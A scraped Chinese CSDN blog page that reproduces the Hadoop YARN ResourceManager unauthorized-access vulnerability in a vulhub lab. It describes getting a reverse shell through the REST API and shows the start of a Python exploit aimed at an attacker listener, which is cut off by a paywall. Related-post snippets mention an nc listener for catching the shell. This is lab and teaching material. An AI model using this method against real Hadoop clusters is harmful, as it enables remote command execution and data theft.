hadoop漏洞_浅谈未授权漏洞——Hadoop未授权

最新推荐文章于 2024-05-26 11:04:44 发布
最新推荐文章于 2024-05-26 11:04:44 发布
阅读量732 收藏 1
点赞数
文章标签: hadoop漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39865204/article/details/111751945
版权

0x01 漏洞简介以及危害

Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。

0x02 漏洞利用

环境复现

目标靶机:mac os

ip:192.168.2.85

攻击机:kali

ip:10.211.55.8

Hadoop相关环境利用vulhub进行复现,vulhub安装教程请自行百度

cd /vulhub/hadoop/unauthorized-yarn

docker-compose up -d

访问http://ip:8088即可看到Hadoop YARN ResourceManager WebUI页面,形成了未授权访问

反弹shell

可以利用REST API命令执行,在攻击机监听端口,获取反弹shell

#python exp:

#!/usr/bin/env python

import requests

target = 'http://192.168.2.85:8088/'

lhost = '10.211.55.8' # put your local host ip here, and listen at port 9999

url 

最低0.47元/天 解锁文章
weixin_39865204
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
hadoop漏洞_首发预警 | 黑客利用Hadoop Yarn资源管理系统授权访问漏洞进行攻击...
weixin_39731271的博客
12-20 319
4月30日,阿里云发现,俄罗斯黑客利用Hadoop Yarn资源管理系统REST API授权访问漏洞进行攻击。Hadoop是一款由Apache基金会推出的分布式系统框架,它通过著名的 MapReduce 算法进行分布式处理,Yarn是Hadoop集群的资源管理系统。此次事件主要因Hadoop YARN 资源管理系统配置不当,导致可以授权进行访问,从而被攻击者恶意利用。攻击者无需认证即可通过R...
Hadoop YARN ResourceManager 授权访问getshell
09-23
利用Hadoop YARN ResourceManager 授权访问getshell工具以及WORD说明
关于Hadoop授权访问可导致数据泄露通知
weixin_30787531的博客
06-09 390
尊敬的腾讯云客户: 您好!近日,外部媒体报道全球Hadoop服务器因配置不安全导致海量数据泄露,涉及使用Hadoop分布式文件系统(HDFS)的近4500台服务器,数据量高达5120 TB (5.12 PB),经分析,这批数据泄露的近4500台HDFS服务器中以美国和中国为主,为避免您的主机受影响,请您尽快进行安全自查,如受影响,请按照如下修复建议开展修复工作,避免数据泄露,涉及的详细信息如下: ...
Hadoop 授权访问漏洞复现
最新发布
qq_68581192的博客
05-26 599
Hadoop是一个由 Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了Hadoop机器HDFS的50070 web端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。
hadoop授权访问漏洞
qq_29365787的博客
11-05 1022
一、漏洞介绍 Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除、下载,目录浏览甚至命令执行等操作。 二、漏洞复现 复现步骤: 1、 使用vulhub搭建漏洞环境 2、 检查环境情况(环境是否已经启动起来,靶机和受害机是否能连通) 3、 利用poc进行漏洞利用 在本地监听等待反弹 shell 连接 另开一个窗口运行poc 反弹链接成
大数据安全:hadoop面临的安全挑战
拟声的主扬在江湖
08-22 673
大数据安全:hadoop面临的安全挑战       大数据分析处理日渐成为企业的主流业务,而Hadoop了成为了大数据处理的主要工具,但它却存在安全风险。 对其内容详细阅读
授权访问漏洞总结
weixin_45439698的博客
07-29 5885
授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。 常见的授权访问漏洞 1.MongoDB 授权访问漏洞 2.Redis 授权访问漏洞 3.Memcached 授权访问漏洞CVE-2013-7239 4.JBOSS 授权访问漏洞 5.VNC 授权访问漏洞 6.Docker 授权访问漏...
hadoop2.6_windows_x64.zip
10-22
在系统环境变量中添加HADOOP_HOME,值为Hadoop的安装目录,同时在Path变量中加入%HADOOP_HOME%\bin和%HADOOP_HOME%\sbin,以便在命令行中直接运行Hadoop命令。 对于Hadoop配置,你需要编辑几个核心配置文件,如hdfs...
mapred.zip_hadoop_hadoop mapreduce_mapReduce
09-20
Hadoop生态系统中,MapReduce是一种分布式计算框架,它允许用户编写并运行处理大量数据的程序。这个"mapred.zip"文件显然包含了与Hadoop MapReduce相关的测试样例、文档和源码,这对于理解MapReduce的工作原理以及...
hadoop_join.jar.zip_hadoop_hadoop query_reduce
09-20
本文将深入探讨如何使用Hadoop和MapReduce进行高效的Join查询,并解析如何通过`hadoop_join.jar`这个工具来实现这一过程。 Hadoop是Apache软件基金会开发的一个开源分布式计算框架,它的核心组件包括HDFSHadoop ...
漏洞预警:Hadoop 授权访问可导致数据泄露
weixin_33709590的博客
06-02 440
近日,国外媒体报道全球Hadoop服务器因配置不安全导致海量数据泄露,涉及使用Hadoop分布式文件系统(HDFS)的近4500台服务器,数据量高达5120 TB (5.12 PB),经分析,这批数据泄露的近4500台HDFS服务器中以美国和中国为主。 事件原因: 互联网上暴露的Hadoop服务器如果没有配置访问认证均可能受影响,攻击者针对HDFS的攻...
Hadoop-yarn-授权访问漏洞
2301_76467680的博客
06-26 955
然后sudo nc -lvvp 4444#在攻击机上用NC工具开启4444侦听端口。然后docker-compose up -d拉取环境。这个是exp写入靶场目录下的exploit.py里面。192.168.127.131:8088#执行exp。用whoami命令显示我们的权限为root。docker ps查看镜像是否启动。先进入vluhub里的靶场目录。然后虚拟机ip+端口去访问页面。就可以反弹shell了。
hadhoop授权复现
luminous_you的博客
05-14 172
Hadoop 一般在大数据系统 Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作 访问http://目标主机:8088即可看到Hadoop YARN ResourceManager WebUI页 POC-hadhoop.py #!/usr/bin/env python import requests
Hadoop-yarn-授权访问漏洞
Biu_Biu_Bi的博客
01-04 3146
Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。
谈谈Hadoop安全的那些事儿
iOceanMind的博客
06-22 851
随着大数据的日益流行,hadoop已经成为大数据处理的基础平台,当hadoop被更多公司使用时平台的安全性也为人们所关注。对于处理大数据的组织来说这意味着什么?意味着你拥有的数据越多,对数据的保护就越重要。意味着不仅要安全有效地控制离开自有网络的数据,还必须做好网络内部的数据访问控制。依据数据的敏感程度,我们可能要确保数据分析师能看到的数据是可以让他们分析的数据,并且必须明白发布这些数据及其分析结果可能产生的后果。 Apache Hadoop是最流行的大数据处理平台之一。尽管最初设计Hadoop时根本没考虑
Hadoop 2.0 (YARN)中的安全机制概述
原创学无止尽
12-10 4528
写在前面 安全管理是Hadoop中最复杂的、最难懂和最晦涩的模块,涉及到Hadoop的各个分支和每个分支的各个服务与组件,为了方便大家详细了解Hadoop内部的安全机制实现和各个验证流程,Apache正在编写一个文档,具体可参考HADOOP-9621,注意,附件中的几个pdf不是最新的,想要查看最新文档,可查看google doc上这个链接:Hadoop YARN Security
数据库安全-Redis授权&Hadoop&Mysql&授权访问&RCE 漏洞复现
rumil的博客
10-13 1374
授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露,包括端口的授权常见页面的授权 /admin.php /menu.php常见的授权访问漏洞及默认端口:默认端口统计:8095, 8161, 9100, 9200, 9300, 11211, 15672, 15692, 20048, 25672, 27017]等待。
hadoop授权访问
10-21
Hadoop授权访问指的是用户在尝试访问Hadoop集群资源时,授权的权限要求被拒绝。这可能是因为用户没有正确的用户名和密码,或者缺乏足够的权限来执行所需的操作。 要解决Hadoop授权访问的问题,可以采取以下...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值